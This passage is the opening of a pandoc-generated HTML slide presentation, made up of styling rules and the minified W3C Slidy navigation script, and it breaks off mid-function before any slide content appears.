<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <meta name="generator" content="pandoc" />
  <title></title>
  <style type="text/css">
/*<![CDATA[*/
table.sourceCode, tr.sourceCode, td.lineNumbers, td.sourceCode, table.sourceCode pre 
   { margin: 0; padding: 0; border: 0; vertical-align: baseline; border: none; }
td.lineNumbers { border-right: 1px solid #AAAAAA; text-align: right; color: #AAAAAA; padding-right: 5px; padding-left: 5px; }
td.sourceCode { padding-left: 5px; }
code.sourceCode span.kw { color: #007020; font-weight: bold; } 
code.sourceCode span.dt { color: #902000; }
code.sourceCode span.dv { color: #40a070; }
code.sourceCode span.bn { color: #40a070; }
code.sourceCode span.fl { color: #40a070; }
code.sourceCode span.ch { color: #4070a0; }
code.sourceCode span.st { color: #4070a0; }
code.sourceCode span.co { color: #60a0b0; font-style: italic; }
code.sourceCode span.ot { color: #007020; }
code.sourceCode span.al { color: red; font-weight: bold; }
code.sourceCode span.fu { color: #06287e; }
code.sourceCode span.re { }
code.sourceCode span.er { color: red; font-weight: bold; }
/*]]>*/
  </style>
  <style type="text/css">
/*<![CDATA[*/
/* slidy.css

   Copyright (c) 2005-2010 W3C (MIT, ERCIM, Keio), All Rights Reserved.
   W3C liability, trademark, document use and software licensing
   rules apply, see:

   http://www.w3.org/Consortium/Legal/copyright-documents
   http://www.w3.org/Consortium/Legal/copyright-software
*/
body
{
  margin: 0 0 0 0;
  padding: 0 0 0 0;
  width: 100%;
  height: 100%;
  color: black;
  background-color: white;
  font-family: "URW Palladio L", "Palatino Linotype", sans-serif;
  font-size: 14pt;
}

code
{
  font-family: "DejaVu Sans Mono", monospace;
}

div.toolbar {
  position: fixed; z-index: 200;
  top: auto; bottom: 0; left: 0; right: 0;
  height: 1.2em; text-align: right;
  padding-left: 1em;
  padding-right: 1em; 
  font-size: 60%;
  color: red;
  background-color: rgb(240,240,240);
  border-top: solid 1px rgb(180,180,180);
}

div.toolbar span.copyright {
  color: black;
  margin-left: 0.5em;
}

div.initial_prompt {
  position: absolute;
  z-index: 1000;
  bottom: 1.2em;
  width: 100%;
  background-color: rgb(200,200,200);
  opacity: 0.35;
  background-color: rgb(200,200,200, 0.35);
  cursor: pointer;
}

div.initial_prompt p.help {
  text-align: center;
}

div.initial_prompt p.close {
  text-align: right;
  font-style: italic;
}

div.slidy_toc {
  position: absolute;
  z-index: 300;
  width: 60%;
  max-width: 30em;
  height: 30em;
  overflow: auto;
  top: auto;
  right: auto;
  left: 4em;
  bottom: 4em;
  padding: 1em;
  background: rgb(240,240,240);
  border-style: solid;
  border-width: 2px;
  font-size: 60%;
}

div.slidy_toc .toc_heading {
  text-align: center;
  width: 100%;
  margin: 0;
  margin-bottom: 1em;
  border-bottom-style: solid;
  border-bottom-color: rgb(180,180,180);
  border-bottom-width: 1px;
}

div.slide {
  z-index: 20;
  margin: 0 0 0 0;
  padding-top: 0;
  padding-bottom: 0;
  padding-left: 20px;
  padding-right: 20px;
  border-width: 0;
  clear: both;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  line-height: 120%;
  background-color: transparent;
}

div.slide > div.figure {
  text-align: center
}

div.background {
  display: none;
}

div.handout {
  margin-left: 20px;
  margin-right: 20px;
}

div.slide.titlepage {
  text-align: center;
}

div.slide.titlepage h1 {
  padding-top: 10%;
  margin-right: 0;
}

div.slide h1 {
  padding-left: 0;
  padding-right: 20pt;
  padding-top: 4pt;
  padding-bottom: 4pt;
  margin-top: 0;
  margin-left: 0;
  margin-right: 60pt;
  margin-bottom: 0.5em;
  display: block; 
  font-size: 160%;
  line-height: 1.2em;
  background: transparent;
}

div.toc {
  position: absolute;
  top: auto;
  bottom: 4em;
  left: 4em;
  right: auto;
  width: 60%;
  max-width: 30em;
  height: 30em;
  border: solid thin black;
  padding: 1em;
  background: rgb(240,240,240);
  color: black;
  z-index: 300;
  overflow: auto;
  display: block;
  visibility: visible;
}

div.toc-heading {
  width: 100%;
  border-bottom: solid 1px rgb(180,180,180);
  margin-bottom: 1em;
  text-align: center;
}

pre {
 font-size: 80%;
 font-weight: bold;
 line-height: 120%;
 padding-top: 0.2em;
 padding-bottom: 0.2em;
 padding-left: 1em;
 padding-right: 1em;
 border-style: solid;
 border-left-width: 1em;
 border-top-width: thin;
 border-right-width: thin;
 border-bottom-width: thin;
 border-color: #95ABD0;
 color: #00428C;
 background-color: #E4E5E7;
}

li pre { margin-left: 0; }

blockquote { font-style: italic }

img { background-color: transparent }

p.copyright { font-size: smaller }

.center { text-align: center }
.footnote { font-size: smaller; margin-left: 2em; }

a img { border-width: 0; border-style: none }

a:visited { color: navy }
a:link { color: navy }
a:hover { color: red; text-decoration: underline }
a:active { color: red; text-decoration: underline }

a {text-decoration: none}
.navbar a:link {color: white}
.navbar a:visited {color: yellow}
.navbar a:active {color: red}
.navbar a:hover {color: red}

ul { list-style-type: square; }
ul ul { list-style-type: disc; }
ul ul ul { list-style-type: circle; }
ul ul ul ul { list-style-type: disc; }
li { margin-left: 0.5em; margin-top: 0.5em; font-weight: bold }
li li { font-size: 85%; font-weight: normal }
li li li { font-size: 85%; font-weight: normal }
strong { color: red; }
li li strong { color: black; }
/* pandoc's rules about when to insert paragraphs don't interact well
with the requirement for blank lines around code blocks.  Let's just
neutralize the effects of p in bullets.  */
li > p { margin: 0em; }

div dt
{
  margin-left: 0;
  margin-top: 1em;
  margin-bottom: 0.5em;
  font-weight: bold;
}
div dd
{
  margin-left: 2em;
  margin-bottom: 0.5em;
}


p,pre,ul,ol,blockquote,h2,h3,h4,h5,h6,dl,table {
  margin-left: 1em;
  margin-right: 1em;
}

p.subhead { font-weight: bold; margin-top: 2em; }

.smaller { font-size: smaller }
.bigger { font-size: 130% }

td,th { padding: 0.2em }

ul {
  margin: 0.5em 1.5em 0.5em 1.5em;
  padding: 0;
}

ol {
  margin: 0.5em 1.5em 0.5em 1.5em;
  padding: 0;
}

ul { list-style-type: square; }
ul ul { list-style-type: disc; }
ul ul ul { list-style-type: circle; }
ul ul ul ul { list-style-type: disc; }

ul li { 
  list-style: square;
  margin: 0.1em 0em 0.6em 0;
  padding: 0 0 0 0;
  line-height: 140%;
}

ol li { 
  margin: 0.1em 0em 0.6em 1.5em;
  padding: 0 0 0 0px;
  line-height: 140%;
  list-style-type: decimal;
}

li ul li { 
  font-size: 85%; 
  font-style: normal;
  list-style-type: disc;
  background: transparent;
  padding: 0 0 0 0;
}
li li ul li { 
  font-size: 85%; 
  font-style: normal;
  list-style-type: circle;
  background: transparent;
  padding: 0 0 0 0;
}
li li li ul li {
  list-style-type: disc;
  background: transparent;
  padding: 0 0 0 0;
}

li ol li {
  list-style-type: decimal;
}


li li ol li {
  list-style-type: decimal;
}

/*
 setting class="outline on ol or ul makes it behave as an
 ouline list where blocklevel content in li elements is
 hidden by default and can be expanded or collapsed with
 mouse click. Set class="expand" on li to override default
*/

ol.outline li:hover { cursor: pointer }
ol.outline li.nofold:hover { cursor: default }

ul.outline li:hover { cursor: pointer }
ul.outline li.nofold:hover { cursor: default }

ol.outline { list-style:decimal; }
ol.outline ol { list-style-type:lower-alpha }

ol.outline li.nofold {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/nofold-dim.gif) no-repeat 0px 0.5em;
}
ol.outline li.unfolded {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/fold-dim.gif) no-repeat 0px 0.5em;
}
ol.outline li.folded {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/unfold-dim.gif) no-repeat 0px 0.5em;
}
ol.outline li.unfolded:hover {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/fold.gif) no-repeat 0px 0.5em;
}
ol.outline li.folded:hover {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/unfold.gif) no-repeat 0px 0.5em;
}

ul.outline li.nofold {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/nofold-dim.gif) no-repeat 0px 0.5em;
}
ul.outline li.unfolded {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/fold-dim.gif) no-repeat 0px 0.5em;
}
ul.outline li.folded {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/unfold-dim.gif) no-repeat 0px 0.5em;
}
ul.outline li.unfolded:hover {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/fold.gif) no-repeat 0px 0.5em;
}
ul.outline li.folded:hover {
  padding: 0 0 0 20px;
  background: transparent url(../graphics/unfold.gif) no-repeat 0px 0.5em;
}

/* for slides with class "title" in table of contents */
a.titleslide { font-weight: bold; font-style: italic }

/*
 hide images for work around for save as bug
 where browsers fail to save images used by CSS
*/
img.hidden { display: none; visibility: hidden }
div.initial_prompt { display: none; visibility: hidden }

  div.slide {
     visibility: visible;
     position: inherit;
  }
  div.handout {
     border-top-style: solid;
     border-top-width: thin;
     border-top-color: black;
  }

@media screen {
  .hidden { display: none; visibility: visible }

  div.slide.hidden { display: block; visibility: visible }
  div.handout.hidden { display: block; visibility: visible }
  div.background { display: none; visibility: hidden }
  body.single_slide div.initial_prompt { display: block; visibility: visible }
  body.single_slide div.background { display: block; visibility: visible }
  body.single_slide div.background.hidden { display: none; visibility: hidden }
  body.single_slide .invisible { visibility: hidden }
  body.single_slide .hidden { display: none; visibility: hidden }
  body.single_slide div.slide { position: absolute }
  body.single_slide div.handout { display: none; visibility: hidden }
}

@media print {
  .hidden { display: block; visibility: visible }

  div.slide pre { font-size: 60%; padding-left: 0.5em; }
  div.toolbar { display: none; visibility: hidden; }
  div.slidy_toc { display: none; visibility: hidden; }
  div.background { display: none; visibility: hidden; }
  div.slide { page-break-before: always }
  /* :first-child isn't reliable for print media */
  div.slide.first-slide { page-break-before: avoid }
}

/*]]>*/
  </style>
<script type="text/javascript" charset="utf-8">
/*<![CDATA[*/
var w3c_slidy={ns_pos:(typeof window.pageYOffset!="undefined"),khtml:((navigator.userAgent).indexOf("KHTML")>=0?true:false),opera:((navigator.userAgent).indexOf("Opera")>=0?true:false),ipad:((navigator.userAgent).indexOf("iPad")>=0?true:false),iphone:((navigator.userAgent).indexOf("iPhone")>=0?true:false),ie:(typeof document.all!="undefined"&&!this.opera),ie6:(!this.ns_pos&&navigator.userAgent.indexOf("MSIE 6")!=-1),ie7:(!this.ns_pos&&navigator.userAgent.indexOf("MSIE 7")!=-1),ie8:(!this.ns_pos&&navigator.userAgent.indexOf("MSIE 8")!=-1),ie9:(!this.ns_pos&&navigator.userAgent.indexOf("MSIE 9")!=-1),keyboardless:(this.ipad||this.iphone),is_xhtml:/xml/.test(document.contentType),slide_number:0,slide_number_element:null,slides:[],notes:[],backgrounds:[],toolbar:null,title:null,last_shown:null,eos:null,toc:null,outline:null,selected_text_len:0,view_all:0,want_toolbar:true,mouse_click_enabled:true,scroll_hack:0,disable_slide_click:false,lang:"en",help_anchor:null,help_page:"http://www.w3.org/Talks/Tools/Slidy2/help/help.html",help_text:"Navigate with mouse click, space bar, Cursor Left/Right, or Pg Up and Pg Dn. Use S and B to change font size.",size_index:0,size_adjustment:0,sizes:new Array("10pt","12pt","14pt","16pt","18pt","20pt","22pt","24pt","26pt","28pt","30pt","32pt"),last_width:0,last_height:0,objects:[],set_up:function(){var a=function(){w3c_slidy.init()};if(typeof window.addEventListener!="undefined"){window.addEventListener("load",a,false)}else{window.attachEvent("onload",a)}},hide_slides:function(){if(document.body&&!w3c_slidy.initialized){document.body.style.visibility="hidden"}else{setTimeout(w3c_slidy.hide_slides,50)}},ie_hack:function(){window.resizeBy(0,-1);window.resizeBy(0,1)},init:function(){document.body.style.visibility="visible";this.init_localization();this.add_toolbar();this.wrap_implicit_slides();this.collect_slides();this.collect_notes();this.collect_backgrounds();this.objects=document.body.getElementsByTagName("object");this.patch_anchors();this.slide_number=this.find_slide_number(location.href);window.offscreenbuffering=true;this.size_adjustment=this.find_size_adjust();this.time_left=this.find_duration();this.hide_image_toolbar();this.init_outliner();this.title=document.title;this.is_xhtml=(document.body.tagName=="BODY"?false:true);if(this.slides.length>0){var a=this.slides[this.slide_number];if(this.slide_number>0){this.set_visibility_all_incremental("visible");this.last_shown=this.previous_incremental_item(null);this.set_eos_status(true)}else{this.last_shown=null;this.set_visibility_all_incremental("hidden");this.set_eos_status(!this.next_incremental_item(this.last_shown))}this.set_location();this.add_class(this.slides[0],"first-slide");w3c_slidy.show_slide(a)}this.toc=this.table_of_contents();this.add_initial_prompt();if(!this.keyboardless){this.add_listener(document.body,"click",this.mouse_button_click)}this.add_listener(document,"keydown",this.key_down);this.add_listener(document,"keypress",this.key_press);this.add_listener(window,"resize",this.resized);this.add_listener(window,"scroll",this.scrolled);this.add_listener(window,"unload",this.unloaded);this.single_slide_view();this.resized();if(this.ie7){setTimeout(w3c_slidy.ie_hack,100)}this.show_toolbar();setInterval(function(){w3c_slidy.check_location()},200);w3c_slidy.initialized=true},table_of_contents:function(){var c=this.create_element("div");this.add_class(c,"slidy_toc hidden");var k=this.create_element("div");this.add_class(k,"toc-heading");k.innerHTML=this.localize("Table of Contents");c.appendChild(k);var f=null;for(var d=0;d<this.slides.length;++d){var g=this.has_class(this.slides[d],"title");var e=document.createTextNode((d+1)+". ");c.appendChild(e);var h=this.create_element("a");h.setAttribute("href","#("+(d+1)+")");if(g){this.add_class(h,"titleslide")}var b=document.createTextNode(this.slide_name(d));h.appendChild(b);h.onclick=w3c_slidy.toc_click;h.onkeydown=w3c_slidy.toc_key_down;h.previous=f;if(f){f.next=h}c.appendChild(h);if(d==0){c.first=h}if(d<this.slides.length-1){var j=this.create_element("br");c.appendChild(j)}f=h}c.focus=function(){if(this.first){this.first.focus()}};c.onmouseup=w3c_slidy.mouse_button_up;c.onclick=function(a){a||(a=window.event);if(w3c_slidy.selected_text_len<=0){w3c_slidy.hide_table_of_contents(true)}w3c_slidy.stop_propagation(a);if(a.cancel!=undefined){a.cancel=true}if(a.returnValue!=undefined){a.returnValue=false}return false};document.body.insertBefore(c,document.body.firstChild);return c},is_shown_toc:function(){return !w3c_slidy.has_class(w3c_slidy.toc,"hidden")},show_table_of_contents:function(){w3c_slidy.remove_class(w3c_slidy.toc,"hidden");var a=w3c_slidy.toc;a.focus();if(w3c_slidy.ie7&&w3c_slidy.slide_number==0){setTimeout(w3c_slidy.ie_hack,100)}},hide_table_of_contents:function(a){w3c_slidy.add_class(w3c_slidy.toc,"hidden");if(a&&!w3c_slidy.opera){w3c_slidy.help_anchor.focus()}},toggle_table_of_contents:function(){if(w3c_slidy.is_shown_toc()){w3c_slidy.hide_table_of_contents(true)}else{w3c_slidy.show_table_of_contents()}},toc_click:function(d){if(!d){d=window.event}var c=w3c_slidy.get_target(d);if(c&&c.nodeType==1){var b=c.getAttribute("href");if(b){var a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.slide_number=w3c_slidy.find_slide_number(b);a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.last_shown=null;w3c_slidy.set_location();w3c_slidy.set_visibility_all_incremental("hidden");w3c_slidy.set_eos_status(!w3c_slidy.next_incremental_item(w3c_slidy.last_shown));w3c_slidy.show_slide(a);try{if(!w3c_slidy.opera){w3c_slidy.help_anchor.focus()}}catch(d){}}}w3c_slidy.hide_table_of_contents(true);if(w3c_slidy.ie7){w3c_slidy.ie_hack()}w3c_slidy.stop_propagation(d);return w3c_slidy.cancel(d)},toc_key_down:function(d){var b;if(!d){var d=window.event}if(window.event){b=window.event.keyCode}else{if(d.which){b=d.which}else{return true}}if(!b){return true}if(d.ctrlKey||d.altKey){return true}if(b==13){var c=this.getAttribute("href");if(c){var a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.slide_number=w3c_slidy.find_slide_number(c);a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.last_shown=null;w3c_slidy.set_location();w3c_slidy.set_visibility_all_incremental("hidden");w3c_slidy.set_eos_status(!w3c_slidy.next_incremental_item(w3c_slidy.last_shown));w3c_slidy.show_slide(a);try{if(!w3c_slidy.opera){w3c_slidy.help_anchor.focus()}}catch(f){}}w3c_slidy.hide_table_of_contents(true);if(self.ie7){w3c_slidy.ie_hack()}return w3c_slidy.cancel(d)}if(b==40&&this.next){this.next.focus();return w3c_slidy.cancel(d)}if(b==38&&this.previous){this.previous.focus();return w3c_slidy.cancel(d)}return true},before_print:function(){this.show_all_slides();this.hide_toolbar();alert("before print")},after_print:function(){if(!this.view_all){this.single_slide_view();this.show_toolbar()}alert("after print")},print_slides:function(){this.before_print();window.print();this.after_print()},toggle_view:function(){if(this.view_all){this.single_slide_view();this.show_toolbar();this.view_all=0}else{this.show_all_slides();this.hide_toolbar();this.view_all=1}},show_all_slides:function(){this.remove_class(document.body,"single_slide");this.set_visibility_all_incremental("visible")},single_slide_view:function(){this.add_class(document.body,"single_slide");this.set_visibility_all_incremental("visible");this.last_shown=this.previous_incremental_item(null)},hide_image_toolbar:function(){if(!this.ns_pos){var a=document.getElementsByTagName("IMG");for(var b=0;b<a.length;++b){a[b].setAttribute("galleryimg","no")}}},unloaded:function(a){},is_KHTML:function(){var a=navigator.userAgent;return(a.indexOf("KHTML")>=0?true:false)},slide_name:function(c){var b=null;var a=this.slides[c];var d=this.find_heading(a);if(d){b=this.extract_text(d)}if(!b){b=this.title+"("+(c+1)+")"}b.replace(/\&/g,"&amp;");b.replace(/\</g,"&lt;");b.replace(/\>/g,"&gt;");return b},find_heading:function(a){if(!a||a.nodeType!=1){return null}if(a.nodeName=="H1"||a.nodeName=="h1"){return a}var b=a.firstChild;while(b){a=this.find_heading(b);if(a){return a}b=b.nextSibling}return null},extract_text:function(a){if(!a){return""}if(a.nodeType==3){return a.nodeValue}if(a.nodeType==1){a=a.firstChild;var b="";while(a){b=b+this.extract_text(a);a=a.nextSibling}return b}return""},find_copyright:function(){var a,c;var d=document.getElementsByTagName("meta");for(var b=0;b<d.length;++b){a=d[b].getAttribute("name");c=d[b].getAttribute("content");if(a=="copyright"){return c}}return null},find_size_adjust:function(){var a,c,e;var d=document.getElementsByTagName("meta");for(var b=0;b<d.length;++b){a=d[b].getAttribute("name");c=d[b].getAttribute("content");if(a=="font-size-adjustment"){return 1*c}}return 1},find_duration:function(){var a,c,e;var d=document.getElementsByTagName("meta");for(var b=0;b<d.length;++b){a=d[b].getAttribute("name");c=d[b].getAttribute("content");if(a=="duration"){return 60000*c}}return null},replace_by_non_breaking_space:function(b){for(var a=0;a<b.length;++a){b[a]=160}},init_outliner:function(){var a=document.getElementsByTagName("li");for(var b=0;b<a.length;++b){var c=a[b];if(!this.has_class(c.parentNode,"outline")){continue}c.onclick=this.outline_click;if(this.foldable(c)){c.foldable=true;c.onfocus=function(){w3c_slidy.outline=this};c.onblur=function(){w3c_slidy.outline=null};if(!c.getAttribute("tabindex")){c.setAttribute("tabindex","0")}if(this.has_class(c,"expand")){this.unfold(c)}else{this.fold(c)}}else{this.add_class(c,"nofold");c.visible=true;c.foldable=false}}},foldable:function(b){if(!b||b.nodeType!=1){return false}var a=b.firstChild;while(a){if(a.nodeType==1&&this.is_block(a)){return true}a=a.nextSibling}return false},fold:function(b){if(b){this.remove_class(b,"unfolded");this.add_class(b,"folded")}var a=b?b.firstChild:null;while(a){if(a.nodeType==1&&this.is_block(a)){w3c_slidy.add_class(a,"hidden")}a=a.nextSibling}b.visible=false},unfold:function(b){if(b){this.add_class(b,"unfolded");this.remove_class(b,"folded")}var a=b?b.firstChild:null;while(a){if(a.nodeType==1&&this.is_block(a)){w3c_slidy.remove_class(a,"hidden")}a=a.nextSibling}b.visible=true},outline_click:function(c){if(!c){c=window.event}var a=false;var b=w3c_slidy.get_target(c);while(b&&b.visible==undefined){b=b.parentNode}if(!b){return true}if(c.which){a=(c.which==3)}else{if(c.button){a=(c.button==2)}}if(!a&&b.visible!=undefined){if(b.foldable){if(b.visible){w3c_slidy.fold(b)}else{w3c_slidy.unfold(b)}}w3c_slidy.stop_propagation(c);c.cancel=true;c.returnValue=false}return false},add_initial_prompt:function(){var a=this.create_element("div");a.setAttribute("class","initial_prompt");var b=this.create_element("p");a.appendChild(b);b.setAttribute("class","help");if(this.keyboardless){b.innerHTML="Tap footer to move to next slide"}else{b.innerHTML="Space or Right Arrow to move to next slide, click help below for more details"}this.add_listener(a,"click",function(c){document.body.removeChild(a);w3c_slidy.stop_propagation(c);if(c.cancel!=undefined){c.cancel=true}if(c.returnValue!=undefined){c.returnValue=false}return false});document.body.appendChild(a);this.initial_prompt=a;setTimeout(function(){document.body.removeChild(a)},5000)},add_toolbar:function(){var a,i;this.toolbar=this.create_element("div");this.toolbar.setAttribute("class","toolbar");if(this.ns_pos||!this.ie6){var k=this.create_element("div");k.setAttribute("style","float: right; text-align: right");a=this.create_element("span");a.innerHTML=this.localize("slide")+" n/m";k.appendChild(a);this.toolbar.appendChild(k);var e=this.create_element("div");e.setAttribute("style","text-align: left");this.eos=this.create_element("span");this.eos.innerHTML="* ";e.appendChild(this.eos);var g=this.create_element("a");g.setAttribute("href",this.help_page);g.setAttribute("title",this.localize(this.help_text));g.innerHTML=this.localize("help?");e.appendChild(g);this.help_anchor=g;var d=document.createTextNode(" ");e.appendChild(d);var f=this.create_element("a");f.setAttribute("href","javascript:w3c_slidy.toggle_table_of_contents()");f.setAttribute("title",this.localize("table of contents"));f.innerHTML=this.localize("contents?");e.appendChild(f);var b=document.createTextNode(" ");e.appendChild(b);var h=this.find_copyright();if(h){var j=this.create_element("span");j.className="copyright";j.innerHTML=h;e.appendChild(j)}this.toolbar.setAttribute("tabindex","0");this.toolbar.appendChild(e)}else{this.toolbar.style.position=(this.ie7?"fixed":"absolute");this.toolbar.style.zIndex="200";this.toolbar.style.width="99.9%";this.toolbar.style.height="1.2em";this.toolbar.style.top="auto";this.toolbar.style.bottom="0";this.toolbar.style.left="0";this.toolbar.style.right="0";this.toolbar.style.textAlign="left";this.toolbar.style.fontSize="60%";this.toolbar.style.color="red";this.toolbar.borderWidth=0;this.toolbar.className="toolbar";this.toolbar.style.background="rgb(240,240,240)";var c=this.create_element("span");c.innerHTML="&nbsp;&nbsp;*&nbsp;";this.toolbar.appendChild(c);this.eos=c;var g=this.create_element("a");g.setAttribute("href",this.help_page);g.setAttribute("title",this.localize(this.help_text));g.innerHTML=this.localize("help?");this.toolbar.appendChild(g);this.help_anchor=g;var d=document.createTextNode(" ");this.toolbar.appendChild(d);var f=this.create_element("a");f.setAttribute("href","javascript:toggleTableOfContents()");f.setAttribute("title",this.localize("table of contents".localize));f.innerHTML=this.localize("contents?");this.toolbar.appendChild(f);var b=document.createTextNode(" ");this.toolbar.appendChild(b);var h=this.find_copyright();if(h){var j=this.create_element("span");j.innerHTML=h;j.style.color="black";j.style.marginLeft="0.5em";this.toolbar.appendChild(j)}a=this.create_element("div");a.style.position="absolute";a.style.width="auto";a.style.height="1.2em";a.style.top="auto";a.style.bottom=0;a.style.right="0";a.style.textAlign="right";a.style.color="red";a.style.background="rgb(240,240,240)";a.innerHTML=this.localize("slide")+" n/m";this.toolbar.appendChild(a)}this.toolbar.onclick=function(m){if(!m){m=window.event}var l=m.target;if(!l&&m.srcElement){l=m.srcElement}if(l&&l.nodeType==3){l=l.parentNode}w3c_slidy.stop_propagation(m);if(l&&l.nodeName.toLowerCase()!="a"){w3c_slidy.mouse_button_click(m)}};this.slide_number_element=a;this.set_eos_status(false);document.body.appendChild(this.toolbar)},wrap_implicit_slides:function(){var a,d,c,b,f;var e=document.getElementsByTagName("h1");if(!e){return}for(a=0;a<e.length;++a){d=e[a];if(d.parentNode!=document.body){continue}c=d.nextSibling;f=document.createElement("div");this.add_class(f,"slide");document.body.replaceChild(f,d);f.appendChild(d);while(c){if(c.nodeType==1&&(c.nodeName=="H1"||c.nodeName=="h1"||c.nodeName=="DIV"||c.nodeName=="div")){break}b=c.nextSibling;c=document.body.removeChild(c);f.appendChild(c);c=b}}},collect_slides:function(){var e=new Array();var d=document.body.getElementsByTagName("div");for(var c=0;c<d.length;++c){div=d.item(c);if(this.has_class(div,"slide")){e[e.length]=div;this.add_class(div,"hidden");var b=document.createElement("br");div.appendChild(b);var a=document.createElement("br");div.appendChild(a)}else{if(this.has_class(div,"background")){div.style.display="block"}}}this.slides=e},collect_notes:function(){var b=new Array();var c=document.body.getElementsByTagName("div");for(var a=0;a<c.length;++a){div=c.item(a);if(this.has_class(div,"handout")){b[b.length]=div;this.add_class(div,"hidden")}}this.notes=b},collect_backgrounds:function(){var c=new Array();var b=document.body.getElementsByTagName("div");for(var a=0;a<b.length;++a){div=b.item(a);if(this.has_class(div,"background")){c[c.length]=div;this.add_class(div,"hidden")}}this.backgrounds=c},patch_anchors:function(){var a=w3c_slidy;var c=function(g){if(a.page_address(this.href)==a.page_address(location.href)){var f=a.find_slide_number(this.href);if(f!=a.slide_number){var e=a.slides[a.slide_number];a.hide_slide(e);a.slide_number=f;e=a.slides[a.slide_number];a.show_slide(e);a.set_location()}}else{w3c_slidy.stop_propagation(g)}this.blur();a.disable_slide_click=true};var d=document.body.getElementsByTagName("a");for(var b=0;b<d.length;++b){if(window.addEventListener){d[b].addEventListener("click",c,false)}else{d[b].attachEvent("onclick",c)}}},show_slide_number:function(){var a=w3c_slidy.get_timer();w3c_slidy.slide_number_element.innerHTML=a+w3c_slidy.localize("slide")+" "+(w3c_slidy.slide_number+1)+"/"+w3c_slidy.slides.length},check_location:function(){var b=location.hash;if(w3c_slidy.slide_number>0&&(b==""||b=="#")){w3c_slidy.goto_slide(0)}else{if(b.length>2&&b!="#("+(w3c_slidy.slide_number+1)+")"){var a=parseInt(location.hash.substr(2));if(!isNaN(a)){w3c_slidy.goto_slide(a-1)}}}if(w3c_slidy.time_left&&w3c_slidy.slide_number>0){w3c_slidy.show_slide_number();if(w3c_slidy.time_left>0){w3c_slidy.time_left-=200}}},get_timer:function(){var c="";if(w3c_slidy.time_left){var b,a;a=Math.floor(w3c_slidy.time_left/1000);b=Math.floor(a/60);a=a%60;c=(b?b+"m":"")+a+"s "}return c},set_location:function(){var a=w3c_slidy.page_address(location.href);var b="#("+(w3c_slidy.slide_number+1)+")";if(w3c_slidy.slide_number>=0){a=a+b}if(w3c_slidy.ie&&(w3c_slidy.ie6||w3c_slidy.ie7)){w3c_slidy.push_hash(b)}if(a!=location.href){location.href=a}if(this.khtml){b="("+(w3c_slidy.slide_number+1)+")"}if(!this.ie&&location.hash!=b&&location.hash!=""){location.hash=b}document.title=w3c_slidy.title+" ("+(w3c_slidy.slide_number+1)+")";w3c_slidy.show_slide_number()},page_address:function(b){var a=b.indexOf("#");if(a<0){a=b.indexOf("%23")}if(a<0){return b}return b.substr(0,a)},on_frame_loaded:function(b){location.hash=b;var a=w3c_slidy.page_address(location.href);location.href=a+b},push_hash:function(b){if(b==""){b="#(1)"}window.location.hash=b;var a=document.getElementById("historyFrame").contentWindow.document;a.open("javascript:'<html></html>'");a.write('<html><head><script type="text/javascript">window.parent.w3c_slidy.on_frame_loaded(\''+(b)+"');\74/script></head><body>hello mum</body></html>");a.close()},find_slide_number:function(e){var c=e.indexOf("#");if(c<0){return 0}var b=unescape(e.substr(c+1));var f=document.getElementById(b);if(!f){var d=/\((\d)+\)/;if(b.match(d)){var a=parseInt(b.substring(1,b.length-1));if(a>this.slides.length){a=1}if(--a<0){a=0}return a}d=/\[(\d)+\]/;if(b.match(d)){var a=parseInt(b.substring(1,b.length-1));if(a>this.slides.length){a=1}if(--a<0){a=0}return a}return 0}while(true){if(f.nodeName.toLowerCase()=="div"&&this.has_class(f,"slide")){break}f=f.parentNode;if(!f){return 0}}for(c=0;c<slides.length;++c){if(slides[c]==f){return c}}return 0},previous_slide:function(b){if(!w3c_slidy.view_all){var a;if((b||w3c_slidy.slide_number==0)&&w3c_slidy.last_shown!=null){w3c_slidy.last_shown=w3c_slidy.hide_previous_item(w3c_slidy.last_shown);w3c_slidy.set_eos_status(false)}else{if(w3c_slidy.slide_number>0){a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.slide_number=w3c_slidy.slide_number-1;a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.set_visibility_all_incremental("visible");w3c_slidy.last_shown=w3c_slidy.previous_incremental_item(null);w3c_slidy.set_eos_status(true);w3c_slidy.show_slide(a)}}w3c_slidy.set_location();if(!w3c_slidy.ns_pos){w3c_slidy.refresh_toolbar(200)}}},next_slide:function(c){if(!w3c_slidy.view_all){var a,b=w3c_slidy.last_shown;if(c||w3c_slidy.slide_number==w3c_slidy.slides.length-1){w3c_slidy.last_shown=w3c_slidy.reveal_next_item(w3c_slidy.last_shown)}if((!c||w3c_slidy.last_shown==null)&&w3c_slidy.slide_number<w3c_slidy.slides.length-1){a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.slide_number=w3c_slidy.slide_number+1;a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.last_shown=null;w3c_slidy.set_visibility_all_incremental("hidden");w3c_slidy.show_slide(a)}else{if(!w3c_slidy.last_shown){if(b&&c){w3c_slidy.last_shown=b}}}w3c_slidy.set_location();w3c_slidy.set_eos_status(!w3c_slidy.next_incremental_item(w3c_slidy.last_shown));if(!w3c_slidy.ns_pos){w3c_slidy.refresh_toolbar(200)}}},first_slide:function(){if(!w3c_slidy.view_all){var 